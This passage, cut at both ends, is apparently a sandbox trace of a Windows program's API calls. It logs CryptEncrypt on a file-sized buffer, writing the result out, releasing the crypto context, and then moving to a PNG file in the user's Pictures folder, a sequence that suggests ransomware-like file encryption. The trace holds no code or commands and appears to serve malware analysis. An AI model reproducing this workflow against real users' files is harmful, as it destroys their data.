hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.843] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab338, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.844] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x99c9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x99d0) returned 1 [0210.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.845] CharLowerBuffW (in: lpsz="byte[39376]", cchLength=0xb | out: lpsz="byte[39376]") returned 0xb [0210.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.846] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.846] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.846] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.846] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.846] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.846] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x99c9, dwBufLen=0x99d0 | out: pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x99d0) returned 1 [0210.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.848] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.848] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.848] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.848] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.848] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.848] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.848] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.848] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.851] WriteFile (in: hFile=0x4dc, lpBuffer=0x2a8a938*, nNumberOfBytesToWrite=0x99d0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a938*, lpNumberOfBytesWritten=0x8cf5e4*=0x99d0, lpOverlapped=0x0) returned 1 [0210.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.853] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.853] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.853] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.853] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.853] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.853] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.853] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab068, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.853] CryptDestroyKey (hKey=0x9e2238) returned 1 [0210.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.855] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.855] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.855] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.855] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.855] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.855] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.855] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.855] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.855] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.856] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.856] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.856] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.856] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.856] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.856] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.856] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.856] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.856] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.856] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.857] CryptReleaseContext (hProv=0xa7c330, dwFlags=0x0) returned 1 [0210.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.857] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.857] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.857] CloseHandle (hObject=0x520) returned 1 [0210.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.859] CloseHandle (hObject=0x4dc) returned 1 [0210.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.861] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.861] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.861] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.861] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/LXxgX8.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\LXxgX8.png", lpFilePart=0x8cedf4*="LXxgX8.png") returned 0x23 [0210.861] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LXxgX8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lxxgx8.png")) returned 0x20 [0210.861] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\LXxgX8.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a6af340, ftCreationTime.dwHighDateTime=0x1d5d2e8, ftLastAccessTime.dwLowDateTime=0x2074fe10, ftLastAccessTime.dwHighDateTime=0x1d5d802, ftLastWriteTime.dwLowDateTime=0x2074fe10, ftLastWriteTime.dwHighDateTime=0x1d5d802, nFileSizeHigh=0x0, nFileSizeLow=0x99c9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, 